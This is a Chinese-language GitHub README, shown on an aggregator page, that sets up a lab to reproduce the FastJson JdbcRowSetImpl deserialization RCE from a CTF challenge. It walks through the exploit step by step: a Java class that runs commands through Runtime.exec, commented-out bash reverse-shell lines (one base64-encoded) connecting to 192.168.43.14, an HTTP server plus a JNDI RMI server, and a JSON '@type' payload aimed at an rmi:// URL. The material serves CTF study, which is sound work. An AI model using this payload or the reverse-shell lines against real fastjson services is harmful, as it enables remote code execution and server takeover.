Code Monkey home page Code Monkey logo

fastjson-jdbcrowsetimpl-rce's Introduction

FastJson-JdbcRowSetImpl

初心

在前不久的护网杯CTF比赛中,有一道Web的“easy_web”题,其实就是利用FastJson的JdbcRowSetImpl类反序列化漏洞进行Shell,然后cat Flag。一大部分人对这道题是懵逼的,没做出来,后面因护网杯题目关闭了,没有此漏洞的学习环境,所以我就写了此环境,方便大家学习交流。

漏洞环境构建

root@Bearcat:/# wget "https://github.com/iBearcat/FastJson-JdbcRowSetImpl/raw/master/FastJson_Vul.war" -P /opt/apache-tomcat-8.5.24/webapps/ && cd /opt/apache-tomcat-8.5.24/bin/ && ./startup.sh

20181019

访问漏洞环境 http://localhost:8888/FastJson_Vul

20181019

漏洞利用

在CommandObject.java类中的commands数组中构造想要执行的命令

编译 javac CommandObject.java

import	java.lang.Runtime;
import	java.lang.Process;
public class CommandObject {
    public CommandObject(){
        try{
			Runtime	rt	=	Runtime.getRuntime();
			//Runtime.getRuntime().exec("/bin/bash -i >&/dev/tcp/192.168.43.14/2018<&1");
			//String[] commands = {"bash -c {echo,L2Jpbi9iYXNoIC1pID4mL2Rldi90Y3AvMTkyLjE2OC40My4xNC8yMDE4PCYx}|{base64,-d}|{bash,-i}"};
			
			String[] commands = {"touch","/opt/test"}; //Command
			Process	pc = rt.exec(commands);
			pc.waitFor();
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        CommandObject e = new CommandObject();
    }
}

20181019

漏洞利用

开启一个HTTP服务,并且开启 RMIServer

如:

Python2 -m SimpleHTTPServer 80
Python3 -m http.server 80

生成Payload

java -jar FastJson_JdbcRowSetImpl_JNDI_RMIServer.jar <HTTP服务地址> 指定RMI端口

FastJson_JdbcRowSetImpl_JNDI_RMIServer.jar 会生成一串Json Payload

20181019

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://192.168.43.14:6666/Object","autoCommit":true}

把它Copy到漏洞环境的input中,然后submit进行攻击。

20181019

成功执行命令,并touch test

String[] commands = {"touch","/opt/test"}; //Command

20181019

致谢我的好基友

pyn3rd https://github.com/pyn3rd

背影 https://github.com/yanweijin

fastjson-jdbcrowsetimpl-rce's People

Contributors

rggu2zr avatar

Watchers

James Cloos avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.